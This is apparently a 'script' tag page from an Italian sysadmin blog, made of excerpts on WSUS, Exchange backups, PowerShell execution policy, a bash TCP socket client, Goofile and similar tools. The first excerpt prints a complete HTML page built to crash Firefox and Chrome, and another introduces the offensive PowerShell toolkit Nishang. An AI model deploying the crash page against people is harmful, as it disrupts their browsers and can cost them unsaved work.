Tag: script
-
Ammazzabrowser
<!DOCTYPE html> <html> <head> <script> location = ‘data:text/html,<script>location = “location.toString + \”A\””;’ + ‘A’.repeat( 100000000 ); </script> </head> </html> Questo semplice testo in una pagina HTML manda a zampe all’aria Firefox e Google Chrome, mentre Internet Explorer esce illeso. Potete farlo da voi oppure andare a vostro rischio su crashfirefox.com.
-
Resettare WSUS dopo aver clonato Windows
In molte organizzazioni capita di avere macchine clonate e ri-serializzate con SysPrep o tool analoghi. Se il sistema di origine è già registrato in WSUS può capitare che le macchine clonate non siano visibili nella console di amministrazione. Questo succede perché WSUS salva nel registry un ID proprio in ogni installazione di Windows, che viene utilizzato come…
-
Nevica sul terminale
La neve artificiale non è solamente per i campi da sci, ma anche per le interfacce a riga di comando di *NIX. Con una semplice command line si può far nevicare nel proprio terminale (o fare uno scherzo ad un collega). Questa è la versione ASCII (tutta su una riga): clear;while :;do echo $LINES $COLUMNS…
-
Salvare in un PST le singole cartelle di Exchange
Può capitare di voler fare un backup supplementare rispetto a quello canonico di alcune cartelle di Exchange per alcuni utenti. Lo scopo di quanto segue è fornire uno strumento schedulabile con il servizio integrato di Windows che consenta di salvare con cadenza regolare tutta o una parte di una mailbox di Exchange su un file…
-
Fammi eseguire il dannato script!
Chi si è avvicinato all’utilizzo della PowerShell ha cozzato quasi subito con la bella feature che impedisce di eseguire gli script. Sembra una barzelletta, ma l’interprete di script di Microsoft per default non esegue gli script non firmati. Nulla di grave perché un Set-Execution-Policy Unrestricted rimette le cose a posto. Nonostante ciò, oggi non riuscivo ad eseguire uno script…
-
Nishang
Con Nishang ci si avventura un una zona grigia del software, in cui la differenza tra difesa e offesa diventa indistinguibile. Lo scopo di quanto segue non è quello di incitare la violazione delle leggi, ma di documentare l’esistenza di questi strumenti, per poterli riconoscere in caso di attacchi. La PowerShell di Windows è uno…
-
Goofile
Goofile è una piccola utility a riga di comando (niente interfaccia touch, sorry) di Thomas (G13) Richards che produce un elenco di file di un certo tipo indicizzati da Google in un determinato nome a dominio. L’utilizzo è assolutamente semplice perché l’utility ha bisogno di soli due parametri: ./goofile.py -d siamogeek.com -f pdf Questo comando elenca tutti i file PDF…
-
Client TCP o UDP con bash
exec {fd}<>”/dev/tcp/siamogeek.com/http” # scrittura nel socket printf “GET / HTTP/1.0\r\n” >&$fd printf “\r\n” >&$fd # lettura “until EOF” dal socket cat &- Questo breve script per bash permette di scrivere e leggere dei dati da un socket TCP o UDP senza dipendere dalla presenza di altri programmi. Il tipo di protocollo, l’host e la porta…
-
Ottimizzazione di WSUS
Windows Server Update Services (WSUS) è un utile servizio di Windows Server che permette di gestire gli aggiornamenti automatici di Windows. La consolle di amministrazione di WSUS ha una funzione di ottimizzazione e cleanup che, però non ottimizza le tabelle SQL. Dopo qualche tempo gli indici si frammentano e le performance calano in maniera sensibile, anche…
-
Settimo: non rubare
La copiatura di codice HTML, CSS o JavaScript da altri siti è una pratica vecchia come il web ed è una delle attività, se praticate con moderazione, che serve a migliorare il web stesso. Alcune volte qualcuno oltrepassa la misura e, vuoi per pigrizia, vuoi per fare le cose rapidamente, sfrutta le potenzialità del linguaggio HTML e referenzia degli…
-
Aprire connessioni ssh multiple
Capita spesso di dover aprire una serie di connessioni ssh sempre agli stessi host. Questo è il tipico caso del SysAdmin che arriva la mattina al lavoro, oppure di quando vuole collegarsi ad un gruppo noto di host per eseguire lavori di manutenzione, il tutto senza avere decine di finestre aperte sul desktop, ma sfruttando…
-
Ping parlante
Invariabilmente, quando faccio una dimostrazione di questo script, mi chiedono: “Sì, ma a che serve?” È un ping che oltre a scriverti a video il tempo di round-trip in millisecondi, te lo pronuncia pure. Solo uno strumento in più. Magari un giorno ti capiterà un’occasione in cui ti potrebbe far comodo.